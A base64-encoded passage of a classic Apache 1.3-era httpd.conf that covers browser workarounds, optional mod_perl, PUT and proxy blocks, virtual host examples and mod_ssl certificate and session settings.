aW5hbAojICByZXF1ZXN0IHdpbGwgKm5vdCogYmUgYXZhaWxhYmxlIHRvIHN1Y2ggYSBzY3JpcHQu CgojCiMgQ3VzdG9taXplIGJlaGF2aW91ciBiYXNlZCBvbiB0aGUgYnJvd3NlcgojCjxJZk1vZHVs ZSBtb2Rfc2V0ZW52aWYuYz4KCiAgICAjCiAgICAjIFRoZSBmb2xsb3dpbmcgZGlyZWN0aXZlcyBt b2RpZnkgbm9ybWFsIEhUVFAgcmVzcG9uc2UgYmVoYXZpb3IuCiAgICAjIFRoZSBmaXJzdCBkaXJl Y3RpdmUgZGlzYWJsZXMga2VlcGFsaXZlIGZvciBOZXRzY2FwZSAyLnggYW5kIGJyb3dzZXJzIHRo YXQKICAgICMgc3Bvb2YgaXQuIFRoZXJlIGFyZSBrbm93biBwcm9ibGVtcyB3aXRoIHRoZXNlIGJy b3dzZXIgaW1wbGVtZW50YXRpb25zLgogICAgIyBUaGUgc2Vjb25kIGRpcmVjdGl2ZSBpcyBmb3Ig TWljcm9zb2Z0IEludGVybmV0IEV4cGxvcmVyIDQuMGIyCiAgICAjIHdoaWNoIGhhcyBhIGJyb2tl biBIVFRQLzEuMSBpbXBsZW1lbnRhdGlvbiBhbmQgZG9lcyBub3QgcHJvcGVybHkKICAgICMgc3Vw cG9ydCBrZWVwYWxpdmUgd2hlbiBpdCBpcyB1c2VkIG9uIDMwMSBvciAzMDIgKHJlZGlyZWN0KSBy ZXNwb25zZXMuCiAgICAjCiAgICBCcm93c2VyTWF0Y2ggIk1vemlsbGEvMiIgbm9rZWVwYWxpdmUK ICAgIEJyb3dzZXJNYXRjaCAiTVNJRSA0XC4wYjI7IiBub2tlZXBhbGl2ZSBkb3duZ3JhZGUtMS4w IGZvcmNlLXJlc3BvbnNlLTEuMAoKICAgICMKICAgICMgVGhlIGZvbGxvd2luZyBkaXJlY3RpdmUg ZGlzYWJsZXMgSFRUUC8xLjEgcmVzcG9uc2VzIHRvIGJyb3dzZXJzIHdoaWNoCiAgICAjIGFyZSBp biB2aW9sYXRpb24gb2YgdGhlIEhUVFAvMS4wIHNwZWMgYnkgbm90IGJlaW5nIGFibGUgdG8gZ3Jv ayBhCiAgICAjIGJhc2ljIDEuMSByZXNwb25zZS4KICAgICMKICAgIEJyb3dzZXJNYXRjaCAiUmVh bFBsYXllciA0XC4wIiBmb3JjZS1yZXNwb25zZS0xLjAKICAgIEJyb3dzZXJNYXRjaCAiSmF2YS8x XC4wIiBmb3JjZS1yZXNwb25zZS0xLjAKICAgIEJyb3dzZXJNYXRjaCAiSkRLLzFcLjAiIGZvcmNl LXJlc3BvbnNlLTEuMAoKPC9JZk1vZHVsZT4KIyBFbmQgb2YgYnJvd3NlciBjdXN0b21pemF0aW9u IGRpcmVjdGl2ZXMKCiMKIyBJZiB0aGUgcGVybCBtb2R1bGUgaXMgaW5zdGFsbGVkLCB0aGlzIHdp bGwgYWxsb3cgZXhlY3V0aW9uIG9mIG1vZF9wZXJsCiMgdG8gY29tcGlsZSB5b3VyIHNjcmlwdHMg dG8gc3Vicm91dGluZXMgd2hpY2ggaXQgd2lsbCBleGVjdXRlIGRpcmVjdGx5LAojIGF2b2lkaW5n IHRoZSBjb3N0bHkgY29tcGlsZSBwcm9jZXNzIGZvciBtb3N0IHJlcXVlc3RzLgojCiM8SWZNb2R1 bGUgbW9kX3BlcmwuYz4KIyAgICBBbGlhcyAvcGVybCAvdmFyL3d3dy9wZXJsCiMgICAgPERpcmVj dG9yeSAvdmFyL3d3dy9wZXJsPgojICAgICAgICBTZXRIYW5kbGVyIHBlcmwtc2NyaXB0CiMgICAg ICAgIFBlcmxIYW5kbGVyIEFwYWNoZTo6UmVnaXN0cnkKIyAgICAgICAgT3B0aW9ucyArRXhlY0NH SQojICAgIDwvRGlyZWN0b3J5PgojPC9JZk1vZHVsZT4KCiMKIyBBbGxvdyBodHRwIHB1dCAoc3Vj aCBhcyBOZXRzY2FwZSBHb2xkJ3MgcHVibGlzaCBmZWF0dXJlKQojIFVzZSBodHBhc3N3ZCB0byBn ZW5lcmF0ZSAvZXRjL2h0dHBkL2NvbmYvcGFzc3dkLgojCiM8SWZNb2R1bGUgbW9kX3B1dC5jPgoj ICAgIEFsaWFzIC91cGxvYWQgL3RtcAojICAgIDxEaXJlY3RvcnkgL3RtcD4KIyAgICAgICAgRW5h YmxlUHV0IE9uCiMgICAgICAgIEF1dGhUeXBlIEJhc2ljCiMgICAgICAgIEF1dGhOYW1lIFRlbXBv cmFyeQojICAgICAgICBBdXRoVXNlckZpbGUgL2V0Yy9odHRwZC9jb25mL3Bhc3N3ZAojICAgICAg ICBFbmFibGVEZWxldGUgT2ZmCiMgICAgICAgIHVtYXNrIDAwNwojICAgICAgICA8TGltaXQgUFVU PgojICAgICAgICAgICAgcmVxdWlyZSB2YWxpZC11c2VyCiMgICAgICAgIDwvTGltaXQ+CiMgICAg PC9EaXJlY3Rvcnk+CiM8L0lmTW9kdWxlPgoKIwojIEFsbG93IHNlcnZlciBzdGF0dXMgcmVwb3J0 cywgd2l0aCB0aGUgVVJMIG9mIGh0dHA6Ly9zZXJ2ZXJuYW1lL3NlcnZlci1zdGF0dXMKIyBDaGFu Z2UgdGhlICIueW91cl9kb21haW4uY29tIiB0byBtYXRjaCB5b3VyIGRvbWFpbiB0byBlbmFibGUu CiMKIzxMb2NhdGlvbiAvc2VydmVyLXN0YXR1cz4KIyAgICBTZXRIYW5kbGVyIHNlcnZlci1zdGF0 dXMKIyAgICBPcmRlciBkZW55LGFsbG93CiMgICAgRGVueSBmcm9tIGFsbAojICAgIEFsbG93IGZy b20gLnlvdXJfZG9tYWluLmNvbQojPC9Mb2NhdGlvbj4KCiMKIyBBbGxvdyByZW1vdGUgc2VydmVy IGNvbmZpZ3VyYXRpb24gcmVwb3J0cywgd2l0aCB0aGUgVVJMIG9mCiMgaHR0cDovL3NlcnZlcm5h bWUvc2VydmVyLWluZm8gKHJlcXVpcmVzIHRoYXQgbW9kX2luZm8uYyBiZSBsb2FkZWQpLgojIENo YW5nZSB0aGUgIi55b3VyX2RvbWFpbi5jb20iIHRvIG1hdGNoIHlvdXIgZG9tYWluIHRvIGVuYWJs ZS4KIwojPExvY2F0aW9uIC9zZXJ2ZXItaW5mbz4KIyAgICBTZXRIYW5kbGVyIHNlcnZlci1pbmZv CiMgICAgT3JkZXIgZGVueSxhbGxvdwojICAgIERlbnkgZnJvbSBhbGwKIyAgICBBbGxvdyBmcm9t IC55b3VyX2RvbWFpbi5jb20KIzwvTG9jYXRpb24+CgojCiMgQWxsb3cgYWNjZXNzIHRvIGxvY2Fs IHN5c3RlbSBkb2N1bWVudGF0aW9uIGZyb20gbG9jYWxob3N0CiMKQWxpYXMgL2RvYy8gL3Vzci9z aGFyZS9kb2MvCjxEaXJlY3RvcnkgL3Vzci9zaGFyZS9kb2M+CiAgICBvcmRlciBkZW55LGFsbG93 CiAgICBkZW55IGZyb20gYWxsCiAgICBhbGxvdyBmcm9tIGxvY2FsaG9zdCAubG9jYWxkb21haW4K ICAgIE9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rcwo8L0RpcmVjdG9yeT4KCiMKIyBUaGVy ZSBoYXZlIGJlZW4gcmVwb3J0cyBvZiBwZW9wbGUgdHJ5aW5nIHRvIGFidXNlIGFuIG9sZCBidWcg ZnJvbSBwcmUtMS4xCiMgZGF5cy4gIFRoaXMgYnVnIGludm9sdmVkIGEgQ0dJIHNjcmlwdCBkaXN0 cmlidXRlZCBhcyBhIHBhcnQgb2YgQXBhY2hlLgojIEJ5IHVuY29tbWVudGluZyB0aGVzZSBsaW5l cyB5b3UgY2FuIHJlZGlyZWN0IHRoZXNlIGF0dGFja3MgdG8gYSBsb2dnaW5nIAojIHNjcmlwdCBv biBwaGYuYXBhY2hlLm9yZy4gIE9yLCB5b3UgY2FuIHJlY29yZCB0aGVtIHlvdXJzZWxmLCB1c2lu ZyB0aGUgc2NyaXB0CiMgc3VwcG9ydC9waGZfYWJ1c2VfbG9nLmNnaS4KIwojPExvY2F0aW9uIC9j Z2ktYmluL3BoZio+CiMgICAgRGVueSBmcm9tIGFsbAojICAgIEVycm9yRG9jdW1lbnQgNDAzIGh0 dHA6Ly9waGYuYXBhY2hlLm9yZy9waGZfYWJ1c2VfbG9nLmNnaQojPC9Mb2NhdGlvbj4KCiMKIyBQ cm94eSBTZXJ2ZXIgZGlyZWN0aXZlcy4gVW5jb21tZW50IHRoZSBmb2xsb3dpbmcgbGluZXMgdG8K IyBlbmFibGUgdGhlIHByb3h5IHNlcnZlcjoKIwojPElmTW9kdWxlIG1vZF9wcm94eS5jPgojICAg IFByb3h5UmVxdWVzdHMgT24KCiMgICAgPERpcmVjdG9yeSBwcm94eToqPgojICAgICAgICBPcmRl ciBkZW55LGFsbG93CiMgICAgICAgIERlbnkgZnJvbSBhbGwKIyAgICAgICAgQWxsb3cgZnJvbSAu eW91cl9kb21haW4uY29tCiMgICAgPC9EaXJlY3Rvcnk+CgogICAgIwogICAgIyBFbmFibGUvZGlz YWJsZSB0aGUgaGFuZGxpbmcgb2YgSFRUUC8xLjEgIlZpYToiIGhlYWRlcnMuCiAgICAjICgiRnVs bCIgYWRkcyB0aGUgc2VydmVyIHZlcnNpb247ICJCbG9jayIgcmVtb3ZlcyBhbGwgb3V0Z29pbmcg VmlhOiBoZWFkZXJzKQogICAgIyBTZXQgdG8gb25lIG9mOiBPZmYgfCBPbiB8IEZ1bGwgfCBCbG9j awogICAgIwojICAgIFByb3h5VmlhIE9uCgogICAgIwogICAgIyBUbyBlbmFibGUgdGhlIGNhY2hl IGFzIHdlbGwsIGVkaXQgYW5kIHVuY29tbWVudCB0aGUgZm9sbG93aW5nIGxpbmVzOgogICAgIyAo bm8gY2FjaGluZyB3aXRob3V0IENhY2hlUm9vdCkKICAgICMKIyAgICBDYWNoZVJvb3QgIi92YXIv Y2FjaGUvaHR0cGQiCiMgICAgQ2FjaGVTaXplIDUKIyAgICBDYWNoZUdjSW50ZXJ2YWwgNAojICAg IENhY2hlTWF4RXhwaXJlIDI0CiMgICAgQ2FjaGVMYXN0TW9kaWZpZWRGYWN0b3IgMC4xCiMgICAg Q2FjaGVEZWZhdWx0RXhwaXJlIDEKIyAgICBOb0NhY2hlIGFfZG9tYWluLmNvbSBhbm90aGVyX2Rv bWFpbi5lZHUgam9lcy5nYXJhZ2Vfc2FsZS5jb20KCiM8L0lmTW9kdWxlPgojIEVuZCBvZiBwcm94 eSBkaXJlY3RpdmVzLgoKIyMjIFNlY3Rpb24gMzogVmlydHVhbCBIb3N0cwojCiMgVmlydHVhbEhv c3Q6IElmIHlvdSB3YW50IHRvIG1haW50YWluIG11bHRpcGxlIGRvbWFpbnMvaG9zdG5hbWVzIG9u IHlvdXIKIyBtYWNoaW5lIHlvdSBjYW4gc2V0dXAgVmlydHVhbEhvc3QgY29udGFpbmVycyBmb3Ig dGhlbS4gTW9zdCBjb25maWd1cmF0aW9ucwojIHVzZSBvbmx5IG5hbWUtYmFzZWQgdmlydHVhbCBo b3N0cyBzbyB0aGUgc2VydmVyIGRvZXNuJ3QgbmVlZCB0byB3b3JyeSBhYm91dAojIElQIGFkZHJl c3Nlcy4gVGhpcyBpcyBpbmRpY2F0ZWQgYnkgdGhlIGFzdGVyaXNrcyBpbiB0aGUgZGlyZWN0aXZl cyBiZWxvdy4KIwojIFBsZWFzZSBzZWUgdGhlIGRvY3VtZW50YXRpb24gYXQgPFVSTDpodHRwOi8v d3d3LmFwYWNoZS5vcmcvZG9jcy92aG9zdHMvPgojIGZvciBmdXJ0aGVyIGRldGFpbHMgYmVmb3Jl IHlvdSB0cnkgdG8gc2V0dXAgdmlydHVhbCBob3N0cy4KIwojIFlvdSBtYXkgdXNlIHRoZSBjb21t YW5kIGxpbmUgb3B0aW9uICctUycgdG8gdmVyaWZ5IHlvdXIgdmlydHVhbCBob3N0CiMgY29uZmln dXJhdGlvbi4KCiMKIyBVc2UgbmFtZS1iYXNlZCB2aXJ0dWFsIGhvc3RpbmcuCiMKI05hbWVWaXJ0 dWFsSG9zdCAqCgojCiMgVmlydHVhbEhvc3QgZXhhbXBsZToKIyBBbG1vc3QgYW55IEFwYWNoZSBk aXJlY3RpdmUgbWF5IGdvIGludG8gYSBWaXJ0dWFsSG9zdCBjb250YWluZXIuCiMgVGhlIGZpcnN0 IFZpcnR1YWxIb3N0IHNlY3Rpb24gaXMgdXNlZCBmb3IgcmVxdWVzdHMgd2l0aG91dCBhIGtub3du CiMgc2VydmVyIG5hbWUuCiMKIzxWaXJ0dWFsSG9zdCAqPgojICAgIFNlcnZlckFkbWluIHdlYm1h c3RlckBkdW1teS1ob3N0LmV4YW1wbGUuY29tCiMgICAgRG9jdW1lbnRSb290IC93d3cvZG9jcy9k dW1teS1ob3N0LmV4YW1wbGUuY29tCiMgICAgU2VydmVyTmFtZSBkdW1teS1ob3N0LmV4YW1wbGUu Y29tCiMgICAgRXJyb3JMb2cgbG9ncy9kdW1teS1ob3N0LmV4YW1wbGUuY29tLWVycm9yX2xvZwoj ICAgIEN1c3RvbUxvZyBsb2dzL2R1bW15LWhvc3QuZXhhbXBsZS5jb20tYWNjZXNzX2xvZyBjb21t b24KIzwvVmlydHVhbEhvc3Q+CgojPFZpcnR1YWxIb3N0IF9kZWZhdWx0XzoqPgojPC9WaXJ0dWFs SG9zdD4KCiMjCiMjICBTU0wgR2xvYmFsIENvbnRleHQKIyMKIyMgIEFsbCBTU0wgY29uZmlndXJh dGlvbiBpbiB0aGlzIGNvbnRleHQgYXBwbGllcyBib3RoIHRvCiMjICB0aGUgbWFpbiBzZXJ2ZXIg YW5kIGFsbCBTU0wtZW5hYmxlZCB2aXJ0dWFsIGhvc3RzLgojIwoKIwojICAgU29tZSBNSU1FLXR5 cGVzIGZvciBkb3dubG9hZGluZyBDZXJ0aWZpY2F0ZXMgYW5kIENSTHMKIwo8SWZEZWZpbmUgSEFW RV9TU0w+CkFkZFR5cGUgYXBwbGljYXRpb24veC14NTA5LWNhLWNlcnQgLmNydApBZGRUeXBlIGFw cGxpY2F0aW9uL3gtcGtjczctY3JsICAgIC5jcmwKPC9JZkRlZmluZT4KCjxJZk1vZHVsZSBtb2Rf c3NsLmM+CgojICAgUGFzcyBQaHJhc2UgRGlhbG9nOgojICAgQ29uZmlndXJlIHRoZSBwYXNzIHBo cmFzZSBnYXRoZXJpbmcgcHJvY2Vzcy4KIyAgIFRoZSBmaWx0ZXJpbmcgZGlhbG9nIHByb2dyYW0g KGBidWlsdGluJyBpcyBhIGludGVybmFsCiMgICB0ZXJtaW5hbCBkaWFsb2cpIGhhcyB0byBwcm92 aWRlIHRoZSBwYXNzIHBocmFzZSBvbiBzdGRvdXQuClNTTFBhc3NQaHJhc2VEaWFsb2cgIGJ1aWx0 aW4KCiMgICBJbnRlci1Qcm9jZXNzIFNlc3Npb24gQ2FjaGU6CiMgICBDb25maWd1cmUgdGhlIFNT TCBTZXNzaW9uIENhY2hlOiBGaXJzdCB0aGUgbWVjaGFuaXNtIAojICAgdG8gdXNlIGFuZCBzZWNv bmQgdGhlIGV4cGlyaW5nIHRpbWVvdXQgKGluIHNlY29uZHMpLgojU1NMU2Vzc2lvbkNhY2hlICAg ICAgICBub25lCiNTU0xTZXNzaW9uQ2FjaGUgICAgICAgIHNobWh0OmxvZ3Mvc3NsX3NjYWNoZSg1 MTIwMDApCiNTU0xTZXNzaW9uQ2FjaGUgICAgICAgIHNobWNiOmxvZ3Mvc3NsX3NjYWNoZSg1MTIw MDApClNTTFNlc3Npb25DYWNoZSAgICAgICAgIHNobTpsb2dzL3NzbF9zY2FjaGUoNTEyMDAwKQpT U0xTZXNzaW9uQ2FjaGVUaW1lb3V0ICAzMDAKCiMgICBTZW1hcGhvcmU6CiMgICBDb25maWd1cmUg dGhlIHBhdGggdG8gdGhlIG11dHVhbCBleGNsdXNpb24gc2VtYXBob3JlIHRoZQojICAgU1NMIGVu Z2luZSB1c2VzIGludGVybmFsbHkgZm9yIGludGVyLXByb2Nlc3Mgc3luY2hyb25pemF0aW9uLiAK U1NMTXV0ZXggIGZpbGU6bG9ncy9zc2xfbXV0ZXgKCiMgICBQc2V1ZG8gUmFuZG9tIE51bWJlciBH ZW5lcmF0b3IgKFBSTkcpOgojICAgQ29uZmlndXJlIG9uZSBvciBtb3JlIHNvdXJjZXMgdG8gc2Vl ZCB0aGUgUFJORyBvZiB0aGUgCiMgICBTU0wgbGlicmFyeS4gVGhlIHNlZWQgZGF0YSBzaG91bGQg YmUgb2YgZ29vZCByYW5kb20gcXVhbGl0eS4KIyAgIFdBUk5JTkchIE9uIHNvbWUgcGxhdGZvcm1z IC9kZXYvcmFuZG9tIGJsb2NrcyBpZiBub3QgZW5vdWdoIGVudHJvcHkKIyAgIGlzIGF2YWlsYWJs ZS4gVGhpcyBtZWFucyB5b3UgdGhlbiBjYW5ub3QgdXNlIHRoZSAvZGV2L3JhbmRvbSBkZXZpY2UK IyAgIGJlY2F1c2UgaXQgd291bGQgbGVhZCB0byB2ZXJ5IGxvbmcgY29ubmVjdGlvbiB0aW1lcyAo YXMgbG9uZyBhcwojICAgaXQgcmVxdWlyZXMgdG8gbWFrZSBtb3JlIGVudHJvcHkgYXZhaWxhYmxl KS4gQnV0IHVzdWFsbHkgdGhvc2UKIyAgIHBsYXRmb3JtcyBhZGRpdGlvbmFsbHkgcHJvdmlkZSBh IC9kZXYvdXJhbmRvbSBkZXZpY2Ugd2hpY2ggZG9lc24ndAojICAgYmxvY2suIFNvLCBpZiBhdmFp bGFibGUsIHVzZSB0aGlzIG9uZSBpbnN0ZWFkLiBSZWFkIHRoZSBtb2Rfc3NsIFVzZXIKIyAgIE1h bnVhbCBmb3IgbW9yZSBkZXRhaWxzLgpTU0xSYW5kb21TZWVkIHN0YXJ0dXAgYnVpbHRpbgpTU0xS YW5kb21TZWVkIGNvbm5lY3QgYnVpbHRpbgojU1NMUmFuZG9tU2VlZCBzdGFydHVwIGZpbGU6L2Rl di9yYW5kb20gIDUxMgojU1NMUmFuZG9tU2VlZCBzdGFydHVwIGZpbGU6L2Rldi91cmFuZG9tIDUx MgojU1NMUmFuZG9tU2VlZCBjb25uZWN0IGZpbGU6L2Rldi9yYW5kb20gIDUxMgojU1NMUmFuZG9t U2VlZCBjb25uZWN0IGZpbGU6L2Rldi91cmFuZG9tIDUxMgoKIyAgIExvZ2dpbmc6CiMgICBUaGUg aG9tZSBvZiB0aGUgZGVkaWNhdGVkIFNTTCBwcm90b2NvbCBsb2dmaWxlLiBFcnJvcnMgYXJlCiMg ICBhZGRpdGlvbmFsbHkgZHVwbGljYXRlZCBpbiB0aGUgZ2VuZXJhbCBlcnJvciBsb2cgZmlsZS4g IFB1dAojICAgdGhpcyBzb21ld2hlcmUgd2hlcmUgaXQgY2Fubm90IGJlIHVzZWQgZm9yIHN5bWxp bmsgYXR0YWNrcyBvbgojICAgYSByZWFsIHNlcnZlciAoaS5lLiBzb21ld2hlcmUgd2hlcmUgb25s eSByb290IGNhbiB3cml0ZSkuCiMgICBMb2cgbGV2ZWxzIGFyZSAoYXNjZW5kaW5nIG9yZGVyOiBo aWdoZXIgb25lcyBpbmNsdWRlIGxvd2VyIG9uZXMpOgojICAgbm9uZSwgZXJyb3IsIHdhcm4sIGlu Zm8sIHRyYWNlLCBkZWJ1Zy4KU1NMTG9nICAgICAgbG9ncy9zc2xfZW5naW5lX2xvZwpTU0xMb2dM ZXZlbCBlcnJvcgoKPC9JZk1vZHVsZT4KCjxJZkRlZmluZSBIQVZFX1NTTD4KCiMjCiMjIFNTTCBW aXJ0dWFsIEhvc3QgQ29udGV4dAojIwoKPFZpcnR1YWxIb3N0IF9kZWZhdWx0Xzo0NDM+CgojICBH ZW5lcmFsIHNldHVwIGZvciB0aGUgdmlydHVhbCBob3N0CiMgRG9jdW1lbnRSb290ICIvZXRjL2h0 dHBkL2h0ZG9jcyIKRG9jdW1lbnRSb290ICIvdmFyL3d3dy9odG1sIgojU2VydmVyTmFtZSBuZXcu aG9zdC5uYW1lClNlcnZlck5hbWUgbXlzZXJ2ZXIuY29tCiNTZXJ2ZXJBZG1pbiB5b3VAeW91ci5h ZGRyZXNzCkVycm9yTG9nIGxvZ3MvZXJyb3JfbG9nClRyYW5zZmVyTG9nIGxvZ3MvYWNjZXNzX2xv ZwoKIyAgIFNTTCBFbmdpbmUgU3dpdGNoOgojICAgRW5hYmxlL0Rpc2FibGUgU1NMIGZvciB0aGlz IHZpcnR1YWwgaG9zdC4KU1NMRW5naW5lIG9uCgojICAgU1NMIENpcGhlciBTdWl0ZToKIyAgIExp c3QgdGhlIGNpcGhlcnMgdGhhdCB0aGUgY2xpZW50IGlzIHBlcm1pdHRlZCB0byBuZWdvdGlhdGUu CiMgICBTZWUgdGhlIG1vZF9zc2wgZG9jdW1lbnRhdGlvbiBmb3IgYSBjb21wbGV0ZSBsaXN0Lgoj U1NMQ2lwaGVyU3VpdGUgQUxMOiFBREg6IUVYUE9SVDU2OlJDNCtSU0E6K0hJR0g6K01FRElVTTor TE9XOitTU0x2MjorRVhQOitlTlVMTAoKIyAgIFNlcnZlciBDZXJ0aWZpY2F0ZToKIyAgIFBvaW50 IFNTTENlcnRpZmljYXRlRmlsZSBhdCBhIFBFTSBlbmNvZGVkIGNlcnRpZmljYXRlLiAgSWYKIyAg IHRoZSBjZXJ0aWZpY2F0ZSBpcyBlbmNyeXB0ZWQsIHRoZW4geW91IHdpbGwgYmUgcHJvbXB0ZWQg Zm9yIGEKIyAgIHBhc3MgcGhyYXNlLiAgTm90ZSB0aGF0IGEga2lsbCAtSFVQIHdpbGwgcHJvbXB0 IGFnYWluLiBBIHRlc3QKIyAgIGNlcnRpZmljYXRlIGNhbiBiZSBnZW5lcmF0ZWQgd2l0aCBgbWFr ZSBjZXJ0aWZpY2F0ZScgdW5kZXIKIyAgIGJ1aWx0IHRpbWUuIEtlZXAgaW4gbWluZCB0aGF0IGlm IHlvdSd2ZSBib3RoIGEgUlNBIGFuZCBhIERTQQojICAgY2VydGlmaWNhdGUgeW91IGNhbiBjb25m aWd1cmUgYm90aCBpbiBwYXJhbGxlbCAodG8gYWxzbyBhbGxvdwojICAgdGhlIHVzZSBvZiBEU0Eg Y2lwaGVycywgZXRjLikKU1NMQ2VydGlmaWNhdGVGaWxlIC9ldGMvaHR0cGQvY29uZi9zc2wuY3J0 L3NlcnZlci5jcnQKI1NTTENlcnRpZmljYXRlRmlsZSAvZXRjL2h0dHBkL2NvbmYvc3NsLmNydC9z ZXJ2ZXItZHNhLmNydAoKIyAgIFNlcnZlciBQcml2YXRlIEtleToKIyAgIElmIHRoZSBrZXkgaXMg bm90IGNvbWJpbmVkIHdpdGggdGhlIGNlcnRpZmljYXRlLCB1c2UgdGhpcwojICAgZGlyZWN0aXZl IHRvIHBvaW50IGF0IHRoZSBrZXkgZmlsZS4gIEtlZXAgaW4gbWluZCB0aGF0IGlmCiMgICB5b3Un dmUgYm90aCBhIFJTQSBhbmQgYSBEU0EgcHJpdmF0ZSBrZXkgeW91IGNhbiBjb25maWd1cmUKIyAg IGJvdGggaW4gcGFyYWxsZWwgKHRvIGFsc28gYWxsb3cgdGhlIHVzZSBvZiBEU0EgY2lwaGVycywg ZXRjLikKU1NMQ2VydGlmaWNhdGVLZXlGaWxlIC9ldGMvaHR0cGQvY29uZi9zc2wua2V5L3NlcnZl ci5rZXkKI1NTTENlcnRpZmljYXRlS2V5RmlsZSAvZXRjL2h0dHBkL2NvbmYvc3NsLmtleS9zZXJ2 ZXItZHNhLmtleQoKIyAgIFNlcnZlciBDZXJ0aWZpY2F0ZSBDaGFpbjoKIyAgIFBvaW50IFNTTENl cnRpZmljYXRlQ2hhaW5GaWxlIGF0IGEgZmlsZSBjb250YWluaW5nIHRoZQojICAgY29uY2F0ZW5h dGlvbiBvZiBQRU0gZW5jb2RlZCBDQSBjZXJ0aWZpY2F0ZXMgd2hpY2ggZm9ybSB0aGUKIyAgIGNl cnRpZmljYXRlIGNoYWluIGZvciB0aGUgc2VydmVyIGNlcnRpZmljYXRlLiBBbHRlcm5hdGl2ZWx5 CiMgICB0aGUgcmVmZXJlbmNlZCBmaWxlIGNhbiBiZSB0aGUgc2FtZSBhcyBTU0xDZXJ0aWZpY2F0 ZUZpbGUKIyAgIHdoZW4gdGhlIENBIGNlcnRpZmljYXRlcyBhcmUgZGlyZWN0bHkgYXBwZW5kZWQg dG8gdGhlIHNlcnZlcgojICAgY2VydGlmaWNhdGUgZm9yIGNvbnZpbmllbmNlLgojU1NMQ2VydGlm aWNhdGVDaGFpbkZpbGUgL2V0Yy9odHRwZC9jb25mL3NzbC5jcnQvY2EuY3J0CgojICAgQ2VydGlm aWNhdGUgQXV0aG9yaXR5IChDQSk6CiMgICBTZXQgdGhlIENBIGNlcnRpZmljYXRlIHZlcmlmaWNh dGlvbiBwYXRoIHdoZXJlIHRvIGZpbmQgQ0EKIyAgIGNlcnRpZmljYXRlcyBmb3IgY2xpZW50IGF1 dGhlbnRpY2F0aW9uIG9yIGFsdGVybmF0aXZlbHkgb25lCiMgICBodWdlIGZpbGUgY29udGFpbmlu ZyBhbGwgb2YgdGhlbSAoZmlsZSBtdXN0IGJlIFBFTSBlbmNvZGVkKQojICAgTm90ZTogSW5zaWRl IFNTTENBQ2VydGlmaWNhdGVQYXRoIHlvdSBuZWVkIGhhc2ggc3ltbGlua3MKIyAgICAgICAgIHRv IHBvaW50IHRvIHRoZSBjZXJ0aWZpY2F0ZSBmaWxlcy4gVXNlIHRoZSBwcm92aWRlZAojICAgICAg ICAgTWFrZWZpbGUgdG8gdXBkYXRlIHRoZSBoYXNoIHN5bWxpbmtzIGFmdGVyIGNoYW5nZXMuCiNT U0xDQUNlcnRpZmljYXRlUGF0aCAvZXRjL2h0dHBkL2NvbmYvc3NsLmNydAojU1NMQ0FDZXJ0aWZp Y2F0ZUZpbGUgL2V0Yy9odHRwZC9jb25mL3NzbC5jcnQvY2EtYnVuZGxlLmNydAoKIyAgIENlcnRp ZmljYXRlIFJldm9jYXRpb24gTGlzdHMgKENSTCk6CiMgICBTZXQgdGhlIENBIHJldm9jYXRpb24g cGF0aCB3aGVyZSB0byBmaW5kIENBIENSTHMgZm9yIGNsaWVudAojICAgYXV0aGVudGljYXRpb24g b3IgYWx0ZXJuYXRpdmVseSBvbmUgaHVnZSBmaWxlIGNvbnRhaW5pbmcgYWxsCiMgICBvZiB0aGVt IChmaWxlIG11c3QgYmUgUEVNIGVuY29kZWQpCiMgICBOb3RlOiBJbnNpZGUgU1NMQ0FSZXZvY2F0 aW9uUGF0aCB5b3UgbmVlZCBoYXNoIHN5bWxpbmtzCiMgICAgICAgICB0byBwb2ludCB0byB0aGUg Y2VydGlmaWNhdGUgZmlsZXMuIFVzZSB0aGUgcHJvdmlkZWQKIyAgICAgICAgIE1ha2VmaWxlIHRv IHVwZGF0ZSB0aGUgaGFzaCBzeW1saW5rcyBhZnRlciBjaGFuZ2VzLgojU1NMQ0FSZXZvY2F0aW9u UGF0aCAvZXRjL2h0dHBkL2NvbmYvc3NsLmNybAojU1NMQ0FSZXZvY2F0aW9uRmlsZSAvZXRjL2h0 dHBkL2NvbmYvc3NsLmNybC9jYS1idW5kbGUuY3JsCgojICAgQ2xpZW50IEF1dGhlbnRpY2F0aW9u IChUeXBlKToKIyAgIENsaWVudCBjZXJ0aWZpY2F0ZSB2ZXJpZmljYXRpb24gdHlwZSBhbmQgZGVw dGguICBUeXBlcyBhcmUKIyAgIG5vbmUsIG9wdGlvbmFsLCByZXF1aXJlIGFuZCBvcHRpb25hbF9u b19jYS4gIERlcHRoIGlzIGEKIyAgIG51bWJlciB3aGljaCBzcGVjaWZpZXMgaG93IGRlZXBseSB0 byB2ZXJpZnkgdGhlIGNlcnRpZmljYXRlCiMgICBpc3N1ZXIgY2hhaW4gYmVmb3JlIGRlY2lkaW5n IHRoZSBjZXJ0aWZpY2F0ZSBpcyBub3QgdmFsaWQuCiNTU0xWZXJpZnlDbGllbnQgcmVxdWlyZQoj U1NMVmVyaWZ5RGVwdGggIDEwCgojICAgQWNjZXNzIENvbnRyb2w6CiMgICBXaXRoIFNTTFJlcXVp cmUgeW91IGNhbiBkbyBwZXItZGlyZWN0b3J5IGFjY2VzcyBjb250cm9sIGJhc2VkCiMgICBvbiBh cmJpdHJhcnkgY29tcGxleCBib29sZWFuIGV4cHJlc3Npb25zIGNvbnRhaW5pbmcgc2VydmVyCiMg ICB2YXJpYWJsZSBjaGVja3MgYW5kIG90aGVyIGxvb2t1cCBkaXJlY3RpdmVzLiAgVGhlIHN5bnRh eCBpcyBhCiMgICBtaXh0dXJlIGJldHdlZW4gQyBhbmQgUGVybC4gIFNlZSB0aGUgbW9kX3NzbCBk b2N1bWVudGF0aW9uCiMgICBmb3IgbW9yZSBkZXRhaWxzLgojPExvY2F0aW9uIC8+CiNTU0xSZXF1 aXJlICggICAgJXtTU0xfQ0lQSEVSfSAhfiBtL14oRVhQfE5VTEwpLyBcCiMgICAgICAgICAgICBh bmQgJXtTU0xfQ0xJRU5UX1NfRE5fT30gZXEgIlNuYWtlIE9pbCwgTHRkLiIgXAojICAgICAgICAg ICAgYW5kICV7U1NMX0NMSUVOVF9TX0ROX09VfSBpbiB7IlN0YWZmIiwgIkNBIiwgIkRldiJ9IFwK IyAgICAgICAgICAgIGFuZCAle1RJTUVfV0RBWX0gPj0gMSBhbmQgJXtUSU1FX1dEQVl9IDw9IDUg XAojICAgICAgICAgICAgYW5kICV7VElNRV9IT1VSfSA+PSA4IGFuZCAle1RJTUVfSE9VUn0gPD0g 